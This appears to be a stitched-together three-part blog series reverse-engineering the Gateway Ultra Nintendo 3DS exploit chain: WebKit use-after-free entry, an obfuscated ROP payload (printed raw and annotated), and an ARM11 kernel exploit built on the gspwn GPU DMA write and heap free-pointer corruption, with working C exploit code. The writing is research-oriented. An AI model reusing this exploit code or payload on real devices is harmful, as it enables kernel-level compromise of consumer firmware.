int svcControlMemory(void **outaddr, unsigned int addr0, unsigned int addr1, 
                     unsigned int size, int operation, int permissions);

int
do_gspwn_copy (void *dst, unsigned int len, unsigned int check_val, int check_off)
{
    unsigned int result;

    do
    {
        memcpy (0x18401000, 0x18401000, 0x10000);
        GSPGPU_FlushDataCache (0x18402000, len);
        // src always 0x18402000
        GX_SetTextureCopy(0x18402000, dst, len, 0, 0, 0, 0, 8);
        GSPGPU_FlushDataCache (0x18401000, 16);
        GX_SetTextureCopy(dst, 0x18401000, 0x40, 0, 0, 0, 0, 8);
        memcpy(0x18401000, 0x18401000, 0x10000);
        result = *(unsigned int *)(0x18401000 + check_off);
    } while (result != check_val);

    return 0;
}

int
arm11_kernel_exploit_setup (void)
{
    unsigned int patch_addr;
    unsigned int *buffer;
    int i;
    int (*nop_func)(void);
    int *ipc_buf;
    int model;

    // part 1: corrupt kernel memory
    buffer = 0x18402000;
    // 0xFFFFFE0 is just stack memory for scratch space
    svcControlMemory(0xFFFFFE0, 0x18451000, 0, 0x1000, 1, 0); // free page
    patch_addr = *(int *)0x08F028A4;
    buffer[0] = 1;
    buffer[1] = patch_addr;
    buffer[2] = 0;
    buffer[3] = 0;
    // overwrite free pointer
    do_gspwn_copy(0x18451000, 0x10u, patch_addr, 4);
    // trigger write to kernel
    svcControlMemory(0xFFFFFE0, 0x18450000, 0, 0x1000, 1, 0);

    // part 2: obfuscation or trick to clear code cache
    for (i = 0; i < 0x1000; i++)
    {
        buffer[i] = 0xE1A00000; // ARM NOP instruction
    }
    buffer[i-1] = 0xE12FFF1E; // ARM BX LR instruction
    nop_func = *(unsigned int *)0x08F02894 - 0x10000; // 0x10000 below current code
    do_gspwn_copy(*(unsigned int *)0x08F028A0 - 0x10000, 0x10000, 0xE1A00000, 0);
    nop_func ();

    // part 3: get console model for future use (?)
    __asm__ ("mrc p15,0,%0,c13,c0,3\t\n"
             "add %0, %0, #128\t\n" : "=r" (ipc_buf));

    ipc_buf[0] = 0x50000;
    __asm__ ("mov r4, %0\t\n"
             "mov r0, %1\t\n"
             "ldr r0, [r0]\t\n"
             "svc 0x32\t\n" :: "r" (ipc_buf), "r" (0x3DAAF0) : "r0", "r4");

    if (ipc_buf[1])
    {
        model = ipc_buf[2] & 0xFF;
    }
    else
    {
        model = -1;
    }
    *(int *)0x8F01028 = model;

    return 0;
}

// after running setup, run this to execute func in ARM11 kernel mode
int __attribute__((naked))
arm11_kernel_exploit_exec (int (*func)(int, int, int), int arg1, int arg2)
{
    __asm__ ("mov r5, %0\t\n" // R5 = 0x3D1FFC, not used. likely obfuscation.
             "svc 8\t\n" // CreateThread syscall, corrupted, args not needed
             "bx lr\t\n" :: "r" (0x3D1FFC) : "r5");
}

Vulnerability

The main vulnerability is actually still gspwn. Whereas in the first stage, it was used to overwrite (usually read-only) code from a CRO dynamic library to get userland code execution, it is now used to overwrite a heap free pointer so when the next memory page is freed, it would overwrite kernel memory.

3DS Memory Layout

To understand how the free pointer write corruption works, let’s first go over how the 3DS memory is laid out (in simple terms). You can get the full picture here, but I want to go over some key points. First, the “main” memory (used by applications and services) called the FCRAM is located at physical address 0x20000000 to 0x28000000. It is mapped in virtual memory in many places. First, the main application which is at around FCRAM 0x23xxxxxx (or higher if it is a system process or applet like the web browser) is mapped to 0x00100000 as read-only. Next we have some pages in the FCRAM 0x24xxxxxx region that can be mapped by the application on demand to virtual address 0x18xxxxxx through the syscall ControlMemory. Finally, the entire FCRAM is mapped in kernel 0xF0000000 – 0xF8000000 (this is for 4.1, different in other versions).

Another note about memory is that the ARM11 kernel is not located in the FCRAM, but in something called the AXI WRAM. The name is not important, but what is important is that its physical address 0x1FF80000 is mapped twice in kernel memory space. 0xFFF60000 is marked read-only executable and 0xEFF80000 is marked read-write non-executable. However, since both map the same physical memory, writing to 0xEFF80000 changes the code that executes at 0xFFF60000, which defeats the whole purpose of marking the pages non-executable. Since these mappings only apply in kernel mode, you would still need to perform a write to that address with kernel permissions.
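To keep the different views of memory straight, here is a small set of translation helpers based on the addresses mentioned in these posts. The FCRAM kernel base is the 4.1 value, and the user heap offset (0x18xxxxxx to FCRAM 0x24xxxxxx) is inferred from the examples rather than from any official description.

```python
FCRAM_PHYS = 0x20000000
FCRAM_END = 0x28000000
FCRAM_KERNEL_VA = 0xF0000000     # 4.1; differs on other versions
AXIWRAM_PHYS = 0x1FF80000
AXIWRAM_RW_VA = 0xEFF80000       # read-write, non-executable kernel mapping
USER_HEAP_VA = 0x18000000
USER_HEAP_PHYS = 0x24000000      # inferred from 0x18451000 <-> 0x24451000


def fcram_phys_to_kernel(phys):
    """FCRAM physical address to its kernel virtual address."""
    if not FCRAM_PHYS <= phys < FCRAM_END:
        raise ValueError("not an FCRAM address")
    return phys - FCRAM_PHYS + FCRAM_KERNEL_VA


def user_heap_to_phys(va):
    """User heap virtual address (0x18xxxxxx) to FCRAM physical address."""
    return va - USER_HEAP_VA + USER_HEAP_PHYS


def axiwram_rw_to_phys(va):
    """Kernel read-write AXI WRAM alias to physical address."""
    return va - AXIWRAM_RW_VA + AXIWRAM_PHYS
```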

ControlMemory Unchecked Write

The usual process for handling user controlled pointers in a syscall is to use the special ARM instructions LDRT and STRT, which perform the pointer dereference with user privileges in kernel mode. However, what if we overwrite a pointer that the developers did not think is user controlled? It would use the regular LDR/STR instructions and dereference with kernel privileges. The goal is achieved by the ControlMemory syscall along with gspwn. The ControlMemory syscall is used to allocate and free pages of memory from the heap region of the FCRAM. When it is called to free, like most heap allocators, certain pointers are stored in the newly freed memory block (to point to the next and previous free blocks). Like most heap allocators, it also performs “coalescing,” which means two adjacent free blocks will be combined to form a larger free block (and the pointers to and from it are updated accordingly).

The plan here is to free a block of memory, which places certain pointers in the freed block. This is usually safe since once the user frees the block, it is unmapped from the user virtual memory space and they cannot access the memory any more. However, we can with gspwn, so we use gspwn to overwrite the free pointer, which in turn lets us overwrite the code in the 0xEFF80000 region. This is possible because the pointer dereference is done with kernel permissions, since the pointers stored here are not normally user accessible.

The data stored in the freed region is as follows:

struct free_data
{
    int some_count;
    struct free_data *next_free_block;
    struct free_data *prev_free_block;
    int unk_C;
    int unk_10;
};

When the first ControlMemory call happens in the exploit, it frees FCRAM 0x24451000 and writes the free_data structure to it. We then use gspwn to overwrite next_free_block to point to the kernel code we want to overwrite. Next we call ControlMemory to free the page immediately before (FCRAM 0x24450000). This will coalesce the two blocks, roughly as follows:

((struct free_data *)0x24450000)->next_free_block = ((struct free_data *)0x24451000)->next_free_block;
((struct free_data *)0x24451000)->next_free_block->prev_free_block = (struct free_data *)0x24450000;

As you can see, we control next_free_block of 0x24451000 and therefore control the write.
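To make the primitive concrete, here is a minimal user-space sketch of the coalescing step. It is a simulation under stated assumptions, not the kernel's code: `coalesce_with_next` is a hypothetical name, the field layout is copied from the struct above, and ordinary C objects stand in for kernel memory.

```c
#include <assert.h>
#include <stddef.h>

/* Layout taken from the post; the meaning of the unk_* fields is unknown. */
struct free_data {
    int some_count;
    struct free_data *next_free_block;
    struct free_data *prev_free_block;
    int unk_C;
    int unk_10;
};

/*
 * Hypothetical model of the merge performed when `lower` is freed directly
 * below the already-free block `upper`. upper->next_free_block is trusted
 * without validation, which is the behaviour being abused.
 */
void coalesce_with_next(struct free_data *lower, struct free_data *upper)
{
    assert(lower != NULL && upper != NULL);
    lower->next_free_block = upper->next_free_block;
    /* Unchecked write: the address of `lower` lands at
       (chosen pointer) + offsetof(struct free_data, prev_free_block). */
    upper->next_free_block->prev_free_block = lower;
}
```

Two consequences follow from this sketch. The value written is always the address of the lower block, never an arbitrary value. And with 4-byte ints and pointers, as on the 3DS's ARM11, prev_free_block sits at offset 8, so the write lands 8 bytes past whatever pointer was planted.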

… But we’re not done yet. The above pseudocode was an artist’s rendition of what happens. Obviously, physical addresses are not used here. The user region virtual address (0x18xxxxxx) is not used either. The pointers here are the kernel virtual addresses 0xF4450000 and 0xF4451000. Since we can only write the value 0xF4450000 (or on 9.2, 0xE4450000), this poses a problem. Ideally, we want to write some ARM instruction that allows us to jump to code we control (BX R0 for example). However, 0xF4450000 disassembles to “vst4.8 {d16-d19}, [r5], r0” (don’t worry, I don’t know what that is either) and 0xE4450000 disassembles to “strb r0, [r5], #-0”. Neither can be used (obviously) to control code execution. Now of course, we can try another address and see if we get lucky and the address happens to decode as a branch instruction, but we are not lucky. None of the user mappable/unmappable regions would give us a branch.

Unaligned Code Corruption

Here is the clever idea. What if we stop thinking of the problem as: how do I write an instruction that gives us execution control? but instead as: how do I corrupt the code to control it? I don’t usually like to post assembly listings, but it is impossible to dodge ARM assembly if you made it this far.

A note to systems programmers: There is a feature of ARMv6 that the 3DS enables called unaligned read/write. This means a pointer does NOT have to be word aligned. In other words, you are allowed to write 4 arbitrary bytes to any address, including something like “0x1003”. Now if you’re not a systems designer and don’t know about the problem of unaligned reads/writes (C nicely hides this from you), don’t worry, it just means everything works as you expect it to.

Let’s take a look at an arbitrary syscall, CreateThread. The actual syscall doesn’t matter, we only care about the assembly code that it runs:

   0:	e52de004 	push	{lr}		; (str lr, [sp, #-4]!)
   4:	e24dd00c 	sub	sp, sp, #12
   8:	e58d4004 	str	r4, [sp, #4]
   c:	e58d0000 	str	r0, [sp]
  10:	e28d0008 	add	r0, sp, #8
  14:	eb001051 	bl	0x4160
  18:	e59d1008 	ldr	r1, [sp, #8]
  1c:	e28dd00c 	add	sp, sp, #12
  20:	e49df004 	pop	{pc}		; (ldr pc, [sp], #4)

How do we patch this to control code flow? What if we get rid of the “add” on line 0x1c? Then we have on line 0xc, *SP = R0 and on line 0x20, PC = *SP, and since we trivially control R0 in a syscall, we can pass in a function pointer and run it.

Now if we replace the code at 0x18 with either 0xF4450000 or 0xE4450000, another problem arises. Both of those instructions (and there may be others from other firmware versions) try to dereference R5, which we don’t control. However, what if we write 0xF4450000/0xE4450000 starting at 0x1B? It would now corrupt two instructions instead of just one, but both are “safe” instructions.

...
  14:	eb001051 	bl	0x4160
  18:	009d1008 	addseq	r1, sp, r8
  1c:	e2e44500 	rsc	r4, r4, #0, 10
...

The actual code that is there isn’t particularly useful/important, which is exactly what we want. We successfully patched the kernel to jump to our code with a single syscall. Now making SVC 8 with R0 pointing to some function would run it in ARM11 kernel mode.
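The byte-level effect of the unaligned write can be checked on any machine with a small simulation. This is only a sketch: the helper names are made up for illustration, and a plain byte array stands in for the little-endian kernel code page.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Store a 32-bit value as 4 little-endian bytes at any byte offset. */
void store_le32_unaligned(uint8_t *mem, size_t offset, uint32_t value)
{
    for (int i = 0; i < 4; i++)
        mem[offset + i] = (uint8_t)(value >> (8 * i));
}

/* Read back the aligned little-endian word at `offset`. */
uint32_t load_le32(const uint8_t *mem, size_t offset)
{
    assert(offset % 4 == 0);
    return (uint32_t)mem[offset] |
           ((uint32_t)mem[offset + 1] << 8) |
           ((uint32_t)mem[offset + 2] << 16) |
           ((uint32_t)mem[offset + 3] << 24);
}

/* Fill `code` (at least 0x24 bytes) with the CreateThread stub listed above. */
void load_createthread_stub(uint8_t *code)
{
    static const uint32_t words[9] = {
        0xe52de004, 0xe24dd00c, 0xe58d4004, 0xe58d0000, 0xe28d0008,
        0xeb001051, 0xe59d1008, 0xe28dd00c, 0xe49df004
    };
    for (size_t i = 0; i < 9; i++)
        store_le32_unaligned(code, i * 4, words[i]);
}
```

Calling load_createthread_stub and then store_le32_unaligned(code, 0x1B, 0xE4450000) leaves 0x009d1008 at 0x18 and 0xe2e44500 at 0x1c, matching the patched listing, while the words at 0x14 and 0x20 are untouched. Writing 0xF4450000 instead leaves 0xe2f44500 at 0x1c. Only the top byte of the first instruction and the low three bytes of the second are replaced.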

Closing

Although some may call this exploit overly simple, I thought the way it was exploited was very novel. It involved overwriting pointers that are meant to be inaccessible to users, then a type confusion of pointer to ARM code, and finally abusing unaligned writes to corrupt instructions in a safe way. Next time, I hope to conclude this series by reversing the ARM9 kernel exploit (for those unfamiliar, the 3DS has two kernels, one for applications and one for security, ARM9 is the interesting one). I want to thank, again, sbJFn5r for providing me with various dumps.

Reversing Gateway Ultra First Stage (Part 2)

When we last left off, we looked at the ROP code that loaded a larger second-part of the payload. Now we will walk through what was loaded and how userland native code execution was achieved. I am still an amateur at 3DS hacking so I am sure to get some things wrong, so please post any corrections you have in the comments and I will update the post as needed.

Pseudocode

Some of the hard coded addresses are inside the stack payload loaded by the first part from Launcher.dat (at 0x08F01000).

int GX_SetTextureCopy(void *input_buffer, void *output_buffer, unsigned int size, 
int in_x, int in_y, int out_x, int out_y, int flags);
int GSPGPU_FlushDataCache(void *addr, unsigned int len);
int svcSleepThread(unsigned long long nanoseconds);
void memcpy(void *dst, const void *src, unsigned int len);

// There are offsets and addresses specific to each FW version inside of 
// the first stage that is used by both the first and second stage payloads
struct fw_specific_data // example for 4.1.0
{
    void (*payload_code)(void); // 0x009D2000
    unsigned int unk_4; // 0x252D3000
    unsigned int orig_code; // 0x1E5F8FFD
    void *payload_target; // 0x192D3000
    unsigned int unk_10; // 0xEFF83C97
    unsigned int unk_14; // 0xF0000000
    unsigned int unk_18; // 0xE8000000
    unsigned int unk_1C; // 0xEFFF4C80
    unsigned int unk_20; // 0xEFFE4DD4
    unsigned int unk_24; // 0xFFF84DDC
    unsigned int unk_28; // 0xFFF748C4
    unsigned int unk_2C; // 0xEFFF497C
    unsigned int unk_30; // 0x1FFF4C84
    unsigned int unk_34; // 0xFFFD0000
    unsigned int unk_38; // 0xFFFD2000
    unsigned int unk_3C; // 0xFFFD4000
    unsigned int unk_40; // 0xFFFCE000
};

void payload() // base at 0x08F01000
{
    int i;
    unsigned int kversion;
    struct fw_specific_data *data;
    int code_not_copied;

    // part 1, some setup
    *(int*)0x08000838 = 0x08F02B3C;
    svcSleepThread (0x400000LL);
    svcSleepThread (0x400000LL);
    svcSleepThread (0x400000LL);
    for (i = 0; i < 3; i++) // do 3 times to be safe
    {
        GSPGPU_FlushDataCache (0x18000000, 0x00038400);
        GX_SetTextureCopy (0x18000000, 0x1F48F000, 0x00038400, 0, 0, 0, 0, 8);
        svcSleepThread (0x400000LL);
        GSPGPU_FlushDataCache (0x18000000, 0x00038400);
        GX_SetTextureCopy (0x18000000, 0x1F4C7800, 0x00038400, 0, 0, 0, 0, 8);
        svcSleepThread (0x400000LL);
    }

    kversion = *(unsigned int *)0x1FF80000; // KERNEL_VERSION register
    data = 0x08F02894; // buffer to store FW specific data

    // part 2, get kernel specific data from our buffer
    if (kversion == 0x02220000) // 2.34-0 4.1.0
    {
        memcpy (data, 0x08F028D8, 0x44);
    }
    else if (kversion == 0x02230600) // 2.35-6 5.0.0
    {
        memcpy (data, 0x08F0291C, 0x44);
    }
    else if (kversion == 0x02240000) // 2.36-0 5.1.0
    {
        memcpy (data, 0x08F02960, 0x44);
    }
    else if (kversion == 0x02250000) // 2.37-0 6.0.0
    {
        memcpy (data, 0x08F029A4, 0x44);
    }
    else if (kversion == 0x02260000) // 2.38-0 6.1.0
    {
        memcpy (data, 0x08F029E8, 0x44);
    }
    else if (kversion == 0x02270400) // 2.39-4 7.0.0
    {
        memcpy (data, 0x08F02A2C, 0x44);
    }
    else if (kversion == 0x02280000) // 2.40-0 7.2.0
    {
        memcpy (data, 0x08F02A70, 0x44);
    }
    else if (kversion == 0x022C0600) // 2.44-6 8.0.0
    {
        memcpy (data, 0x08F02AB4, 0x44);
    }

    // part 3, execute code
    do
    {
        // if the function still has its original code, we try again
        code_not_copied = (*(unsigned int *)data->payload_code + data->orig_code) == 0;
        // copy second stage to FCRAM
        memcpy (0x18410000, 0x08F02B90, 0x000021F0);
        // make sure data is written and cache flushed || attempted GW obfuscation
        memcpy (0x18410000, 0x18410000, 0x00010000);
        memcpy (0x18410000, 0x18410000, 0x00010000);
        GSPGPU_FlushDataCache (0x18410000, 0x000021F0);
        // copy the second stage code
        GX_SetTextureCopy (0x18410000, data->payload_target, 0x000021F0, 0, 0, 0, 0, 8);
        svcSleepThread (0x400000LL);
        memcpy (0x18410000, 0x18410000, 0x00010000);
    } while (code_not_copied);

    ((void (*)(void))0x009D2000)();
    // I think it was originally data->payload_code but later they hard coded it 
    // for some reason
}

Details

The first part, I’m not too sure about. I think it’s either some required housekeeping or needless calls to obfuscate the exploit (found later). I couldn’t find any documentation on the 0x1F4XXXXX region except that it is in the VRAM. (EDIT: plutoo tells me it’s the framebuffer. Likely the screen is cleared black for debugging or something.) I am also unsure of the purpose of setting 0x08000838 to some location in the payload that is filled with “0x002CAFE4”. In the second part, version-specific information for each released kernel version is copied to a global space for use by both the first stage and the second stage exploit code. (This includes specific kernel addresses and stuff.)
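The version checks in part 2 follow a regular pattern, which the sketch below tries to capture. The bit layout of the KERNEL_VERSION value is an assumption inferred from the comments in the pseudocode (for example 0x02230600 is annotated as 2.35-6), and the function and macro names are hypothetical. The record addresses are the ones passed to memcpy above, which happen to be spaced exactly 0x44 bytes apart.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define FW_RECORD_BASE  0x08F028D8u /* first record (4.1.0) in the pseudocode */
#define FW_RECORD_SIZE  0x44u       /* length passed to every memcpy */
#define FW_RECORD_COUNT 8u

/* KERNEL_VERSION values in the order the pseudocode tests them. */
static const uint32_t known_kversions[FW_RECORD_COUNT] = {
    0x02220000, 0x02230600, 0x02240000, 0x02250000,
    0x02260000, 0x02270400, 0x02280000, 0x022C0600
};

/* Assumed layout: bits 31-24 major, bits 23-16 minor, bits 15-8 revision. */
void decode_kversion(uint32_t raw, unsigned *major, unsigned *minor,
                     unsigned *revision)
{
    assert(major != NULL && minor != NULL && revision != NULL);
    *major = (raw >> 24) & 0xFF;
    *minor = (raw >> 16) & 0xFF;
    *revision = (raw >> 8) & 0xFF;
}

/* Returns the address of the 0x44-byte record, or 0 if unsupported. */
uint32_t fw_record_address(uint32_t kversion)
{
    for (size_t i = 0; i < FW_RECORD_COUNT; i++) {
        if (known_kversions[i] == kversion)
            return FW_RECORD_BASE + (uint32_t)i * FW_RECORD_SIZE;
    }
    return 0;
}
```

Written this way, the if/else chain collapses into a table lookup, and an unsupported kernel is reported explicitly instead of silently leaving the data buffer unfilled.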

The meat of the exploit is an unchecked GPU DMA write that allows the attacker to overwrite read-only executable pages in memory. This is the same exploit used by smealum in his ninjhax, and he gives a much better explanation of “gspwn” in his blog. In short, certain areas of physical memory are mapped at some virtual address as read-only executable (EDIT: yellows8 tells me specifically, this is in a CRO, which is something like shared libraries for 3DS), but when the physical address of the same location is written to by the GPU, the write does not go through the CPU’s MMU (since the GPU is a different device) and succeeds. The need for thread sleep (and maybe the weird useless memcpys) is because the CPU’s various levels of cache need some time to see the changes that they did not expect from the GPU.

The second stage of the payload is the ARM code copied from Launcher.dat (3.0.0) offset 0x1B90 for a length of 0x21F0 (remember to decrypt it using the “add”-pad stream cipher described in the first post).

Raw ROP Payload Annotated

It is a huge mess, but for those who are curious, here it is. The bulk of the code is useless obfuscation (for example, it would pop 9 registers full of junk data and then fill the same 9 registers with more junk data afterwards). However, the obfuscation is easy to get past if you just ignore everything except gadgets that do 1) memory loads, 2) memory stores, 3) flag sets, or 4) function calls. Every other gadget is useless. They also do this weird thing where they “memcpy” one part of the stack to another part (which goes past the current SP). However, comparing the two blocks of data (before and after the copy) shows nothing different aside from some garbage values.

Reversing Gateway Ultra First Stage (Part 1)

And now for something completely different…

As a break from Vita hacking, I’ve decided to play around with the Nintendo 3DS exploit released by Gateway yesterday. The 3DS is a much easier console to hack, but unfortunately, the scene is dominated by a piracy company who, ironically, implement various “features” to protect their intellectual property (one such feature purposely bricks any user of a cloned piracy cart–and also “legitimate” users too). Ethics aside, it would be useful to reverse Gateway’s exploits and use them for homebrew loading so I took a quick look at it. The first stage of the exploit is an entry-point into the system that allows code to run in the unprivileged user-mode. It is usually used to exploit a kernel vulnerability, which is the second stage. In the unique case of Gateway, the first stage is broken up into two parts (in order for them to obfuscate their payload). I am only going to look at the first part for now.

Vulnerability

The userland vulnerability is a known use-after-free bug in WebKit found in April last year (and no, the latest Vita firmware is not vulnerable). Depending on the user-agent of the 3DS visiting the exploit page, a different payload for that browser version is sent. A GBATemp user has dumped all the possible payloads, and I used the 4.x one in my analysis (although I believe the only differences between the payloads are memory offsets).

Details

This is what the initial first stage payload does:

void *_this = 0x08F10000;
int *read_len = 0x08F10020;
int *buffer = 0x08F01000;
int state = 0;
int i = 0;
FS_MOUNTSDMC("dmc:");
IFile_Open(_this, L"dmc:/Launcher.dat", 0x1);
*((int *)_this + 1) = 0x00012000; // fseek according to sm on #3dsdev
IFile_Read(_this, read_len, buffer, 0x4000);

for (i = 0; i < 0x4000/4; i++)
{
    state += 0xD5828281;
    buffer[i] += state;
}

The important part here is that the rest of the payload is decrypted from “Launcher.dat” by creating a stream cipher from a (crappy) PRNG that just increments by 0xD5828281 every iteration. Instead of an xor-pad, it uses an “add”-pad. Otherwise it is pretty standard obfuscation. A neat trick in this ROP payload is the casting of ARM code as Thumb to get gadgets that were not originally compiled into code (I am unsure if they also tried casting RO data as Thumb code, as that is also a way of getting extra gadgets). Another neat trick is emulating loops by using ARM conditional stores to conditionally set the stack pointer to some value (although I was told they used this trick in the original Gateway payload too).
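For anyone who wants to decrypt Launcher.dat offline, the loop above translates into the following sketch. It assumes the data has already been loaded as little-endian 32-bit words (as the 3DS sees them); the function names are mine. Unsigned types are used so that the wrap-around is well defined in C, which is not the case for the `int` in the pseudocode.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define GW_PAD_STEP 0xD5828281u /* per-word increment from the ROP payload */

/* Decrypt in place: add the running pad to each 32-bit word. */
void add_pad_decrypt(uint32_t *words, size_t count)
{
    uint32_t state = 0;
    assert(words != NULL || count == 0);
    for (size_t i = 0; i < count; i++) {
        state += GW_PAD_STEP; /* unsigned arithmetic wraps mod 2^32 */
        words[i] += state;
    }
}

/* Inverse operation: subtract the same pad. Handy for round-trip checks. */
void add_pad_encrypt(uint32_t *words, size_t count)
{
    uint32_t state = 0;
    assert(words != NULL || count == 0);
    for (size_t i = 0; i < count; i++) {
        state += GW_PAD_STEP;
        words[i] -= state;
    }
}
```

The state restarts at zero for each call, so, going by the pseudocode above, the 0x4000 bytes read at file offset 0x12000 would be passed in as one buffer of 0x1000 words.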

Future

The first part was very simple and straightforward and was easy to reverse. I am expecting that the second part would involve a lot more code so I may need to work on a tool to extract the gadgets from code. (By the way, thanks to sbJFn5r on #3dsdev for providing me with the WebKit code to look at and sm for the hint about fseek). It is likely that I won’t have the time to continue this though (still working on the Vita) but it seems like many others are farther ahead than me anyways.

Payload

For those who care, the raw (annotated) payload for 4.X:

0x08B47400: 0x0010FFFD ; (nop) POP {PC}
0x08B47404: 0x0010FFFD ; (nop) POP {PC}
0x08B47408: 0x0010FFFD ; (nop) POP {PC}
0x08B4740C: 0x0010FFFD ; (nop) POP {PC}
0x08B47410: 0x002AD574 ; LDMFD   SP!, {R0,PC}
0x08B47414: 0x002A5F27 ; R0 = "dmc:"
0x08B47418: 0x00332BEC ; FS_MOUNTSDMC(), then LDMFD   SP!, {R3-R5,PC}
0x08B4741C: 0x08B475F0 ; R3, dummy
0x08B47420: 0x00188008 ; R4, dummy
0x08B47424: 0x001DA00C ; R5, dummy
0x08B47428: 0x0017943B ; Thumb: POP     {R0-R4,R7,PC}
0x08B4742C: 0x08F10000 ; R0 = this
0x08B47430: 0x08B47630 ; R1 = L"dmc:/Launcher.dat"
0x08B47434: 0x00000001 ; R2 = read/only
0x08B47438: 0x0039B020 ; R3, dummy
0x08B4743C: 0x001CC01C ; R4, dummy
0x08B47440: 0x002C6010 ; R7, dummy
0x08B47444: 0x0025B0A8 ; IFile_Open(), then LDMFD   SP!, {R4-R7,PC}
0x08B47448: 0x00231FF0 ; R4, dummy
0x08B4744C: 0x002CBFF0 ; R5, dummy
0x08B47450: 0x00124000 ; R6, dummy
0x08B47454: 0x0033FFFD ; R7, dummy
0x08B47458: 0x0010FFFD ; (nop) POP {PC}
0x08B4745C: 0x002AD574 ; LDMFD   SP!, {R0,PC}
0x08B47460: 0x00012000 ; R0
0x08B47464: 0x00269758 ; LDMFD   SP!, {R1,PC}
0x08B47468: 0x08F10004 ; R1
0x08B4746C: 0x00140450 ; *(int*)0x08F10004 = 0x00012000, then LDMFD   SP!, {R4,PC}
0x08B47470: 0x001CC024 ; R4
0x08B47474: 0x0017943B ; Thumb: POP     {R0-R4,R7,PC}
0x08B47478: 0x08F10000 ; R0 = this
0x08B4747C: 0x08F10020 ; R1 = p_total_read
0x08B47480: 0x08F01000 ; R2 = read_buffer
0x08B47484: 0x00004000 ; R3 = size
0x08B47488: 0x00295FF8 ; R4, dummy
0x08B4748C: 0x00253FFC ; R7, dummy
0x08B47490: 0x002FC8E8 ; IFile_Read, then LDMFD   SP!, {R4-R9,PC}
0x08B47494: 0x002BE030 ; R4, dummy
0x08B47498: 0x00212010 ; R5, dummy
0x08B4749C: 0x00271F40 ; R6, dummy
0x08B474A0: 0x0020C05C ; R7, dummy
0x08B474A4: 0x002DE0C4 ; R8, dummy
... START_DECODE_LOOP ...
0x08B474A8: 0x001B2000 ; R9, dummy || LR, dummy (upon loop)
0x08B474AC: 0x002AD574 ; LDMFD   SP!, {R0,PC}
0x08B474B0: 0x08B4750C ; R0 (&state)
0x08B474B4: 0x001CCC64 ; R0 = *R0 = state, LDMFD   SP!, {R4,PC}
0x08B474B8: 0x001057C4 ; R4, dummy
0x08B474BC: 0x00269758 ; LDMFD   SP!, {R1,PC}
0x08B474C0: 0xD5828281 ; R1 (seed)
0x08B474C4: 0x00207954 ; R0 = R0 + R1, LDMFD   SP!, {R4,PC}
0x08B474C8: 0x0011FFFD ; R4, dummy
0x08B474CC: 0x00269758 ; LDMFD   SP!, {R1,PC}
0x08B474D0: 0x08B4750C ; R1 (&state)
0x08B474D4: 0x00140450 ; *R1 = R0 = next random, LDMFD   SP!, {R4,PC}
0x08B474D8: 0x00354850 ; R4, dummy
0x08B474DC: 0x002AD574 ; LDMFD   SP!, {R0,PC}
0x08B474E0: 0x08B47618 ; R0 (&buffer)
0x08B474E4: 0x001CCC64 ; R0 = *R0 = buffer, LDMFD   SP!, {R4,PC}
0x08B474E8: 0x00127F6D ; R4, dummy
0x08B474EC: 0x00100D24 ; LDMFD   SP!, {R4-R6,PC}
0x08B474F0: 0x001037E0 ; R4, dummy
0x08B474F4: 0x08B4748C ; R5, dummy
0x08B474F8: 0x08B4740C ; R6, dummy
0x08B474FC: 0x001CCC64 ; R0 = *R0 (read32 from buffer), LDMFD   SP!, {R4,PC}
0x08B47500: 0x0011BB00 ; R4, dummy
0x08B47504: 0x0010FFFD ; (nop) POP {PC}
0x08B47508: 0x00269758 ; LDMFD   SP!, {R1,PC}
0x08B4750C: 0x00000000 ; R1 (PRG state)
0x08B47510: 0x00207954 ; R0 = R0 + R1 (add PRG state to buffer data), LDMFD   SP!, {R4,PC}
0x08B47514: 0x001303A0 ; R4, dummy
0x08B47518: 0x00103DA8 ; LDMFD   SP!, {R4-R12,PC}
0x08B4751C: 0x00101434 ; R4, dummy
0x08B47520: 0x0022FF64 ; R5, dummy
0x08B47524: 0x001303A0 ; R6, dummy
0x08B47528: 0x08B47400 ; R7, dummy
0x08B4752C: 0x0010FFFD ; R8, dummy
0x08B47530: 0x0010FFFD ; R9, dummy
0x08B47534: 0x00100B5C ; R10, dummy
0x08B47538: 0x0022FE44 ; R11, dummy
0x08B4753C: 0x0010FFFD ; R12, (nop) POP {PC}
0x08B47540: 0x0018114C ; LDMFD   SP!, {R4-R6,LR}, BX R12
0x08B47544: 0x001057C4 ; R4, dummy
0x08B47548: 0x00228AF4 ; R5, dummy
0x08B4754C: 0x00350658 ; R6, dummy
0x08B47550: 0x0010FFFD ; LR, (nop) POP {PC}
0x08B47554: 0x00158DE7 ; R1 = R0 = (decoded data), BLX LR
0x08B47558: 0x002AD574 ; LDMFD   SP!, {R0,PC}
0x08B4755C: 0x08B47618 ; R0 (&buffer)
0x08B47560: 0x001CCC64 ; R0 = *R0 = buffer, LDMFD   SP!, {R4,PC}
0x08B47564: 0x0011FFFD ; R4, dummy
0x08B47568: 0x00119B94 ; *R0 = R1 = (decoded data), LDMFD   SP!, {R4,PC}
0x08B4756C: 0x00106694 ; R4, dummy
0x08B47570: 0x00269758 ; LDMFD   SP!, {R1,PC}
0x08B47574: 0x00000004 ; R1
0x08B47578: 0x00207954 ; R0 = R0 + R1 (buffer + 4), LDMFD   SP!, {R4,PC}
0x08B4757C: 0x00130344 ; R4, dummy
0x08B47580: 0x00269758 ; LDMFD   SP!, {R1,PC}
0x08B47584: 0x08B47618 ; R1 (&buffer)
0x08B47588: 0x00140450 ; *R1 = R0 (set new buffer), LDMFD   SP!, {R4,PC}
0x08B4758C: 0x00100D24 ; R4, dummy
0x08B47590: 0x00269758 ; LDMFD   SP!, {R1,PC}
0x08B47594: 0xF70FB000 ; R1
0x08B47598: 0x00207954 ; R0 = R0 + R1 = 0xFFFFC004, LDMFD   SP!, {R4,PC}
0x08B4759C: 0x00119864 ; R4, dummy
0x08B475A0: 0x001B560C ; SET_FLAGS (R0 != 0), if (flags) R0 = 1, LDMFD   SP!, {R3,PC}
0x08B475A4: 0x002059C0 ; R3, dummy
0x08B475A8: 0x002AD574 ; LDMFD   SP!, {R0,PC}
0x08B475AC: 0x08B47610 ; R0 (val for LR)
0x08B475B0: 0x00269758 ; LDMFD   SP!, {R1,PC}
0x08B475B4: 0x08F00FFC ; R1
0x08B475B8: 0x00119B94 ; *R0 = R1 = 0x08F00FFC (next stage), LDMFD   SP!, {R4,PC}
0x08B475BC: 0x00355FD4 ; R4, dummy
0x08B475C0: 0x00269758 ; LDMFD   SP!, {R1,PC}
